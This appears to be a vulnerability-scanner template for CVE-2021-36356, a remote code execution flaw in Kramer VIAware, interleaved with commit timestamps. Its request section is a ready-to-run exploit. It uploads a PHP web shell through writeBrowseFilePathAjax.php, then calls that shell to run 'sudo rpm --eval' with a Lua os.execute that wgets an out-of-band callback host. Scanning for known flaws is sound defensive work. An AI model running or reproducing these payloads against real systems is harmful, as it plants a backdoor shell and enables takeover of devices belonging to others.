2022-04-30 20:27:39 +00:00
id : CVE-2021-36356
2022-04-30 10:22:52 +00:00
info :
2022-05-18 20:58:07 +00:00
name : Kramer VIAware - Remote Code Execution
2022-04-30 10:22:52 +00:00
author : gy741
severity : critical
description : KRAMER VIAware through August 2021 allows remote attackers to execute arbitrary code because ajaxPages/writeBrowseFilePathAjax.php accepts arbitrary executable pathnames.
reference :
- https://www.exploit-db.com/exploits/50856
- https://nvd.nist.gov/vuln/detail/CVE-2021-36356
- https://nvd.nist.gov/vuln/detail/CVE-2021-35064
2022-05-17 09:18:12 +00:00
- https://write-up.github.io/kramerav/
2022-04-30 20:29:38 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-05-17 09:18:12 +00:00
cvss-score : 9.8
2022-04-30 20:29:38 +00:00
cve-id : CVE-2021-36356
cwe-id : CWE-434
2022-08-27 04:41:18 +00:00
tags : viaware,cve,cve2021,kramer,edb,rce
2022-04-30 10:22:52 +00:00
requests :
- raw :
- |
POST /ajaxPages/writeBrowseFilePathAjax.php HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2022-04-30 20:27:39 +00:00
radioBtnVal=%3C%3Fphp%0A++++++++if%28isset%28%24_GET%5B%27cmd%27%5D%29%29%0A++++++++%7B%0A++++++++++++system%28%24_GET%5B%27cmd%27%5D%29%3B%0A++++++++%7D%3F%3E&associateFileName=%2Fvar%2Fwww%2Fhtml%2F{{randstr}}.php
2022-04-30 10:22:52 +00:00
- |
2022-04-30 20:27:39 +00:00
GET /{{randstr}}.php?cmd=sudo%20rpm%20--eval%20'%25%7Blua:os.execute(%22wget%20http://{{interactsh-url}}%22)%7D' HTTP/1.1
2022-04-30 10:22:52 +00:00
Host : {{Hostname}}
matchers :
- type : word
part : interactsh_protocol
words :
- "http"
2022-05-18 20:58:07 +00:00
# Enhanced by mp on 2022/05/18